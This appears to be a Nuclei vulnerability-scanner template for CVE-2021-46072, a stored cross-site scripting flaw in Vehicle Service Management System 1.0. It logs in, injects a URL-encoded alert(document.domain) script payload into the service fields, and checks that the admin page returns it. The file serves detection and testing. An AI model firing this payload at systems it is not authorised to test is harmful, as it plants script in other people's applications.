52 lines
1.8 KiB
YAML
52 lines
1.8 KiB
YAML
id: CVE-2021-46072
|
|
|
|
info:
|
|
name: Vehicle Service Management System - Stored Cross Site Scripting
|
|
author: TenBird
|
|
severity: medium
|
|
description: |
|
|
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.
|
|
reference:
|
|
- https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS
|
|
- https://www.plsanu.com/vehicle-service-management-system-service-list-stored-cross-site-scripting-xss
|
|
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-46072
|
|
classification:
|
|
cve-id: CVE-2021-46072
|
|
metadata:
|
|
verified: true
|
|
tags: cve,cve2021,xss,vms,authenticated
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /classes/Login.php?f=login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
username={{username}}&password={{password}}
|
|
|
|
- |
|
|
POST /classes/Master.php?f=save_service HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1
|
|
|
|
- |
|
|
GET /admin/?page=maintenance/services HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
redirects: true
|
|
max-redirects: 2
|
|
cookie-reuse: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(all_headers_3, 'text/html')"
|
|
- "status_code_3 == 200"
|
|
- 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
|
|
condition: and
|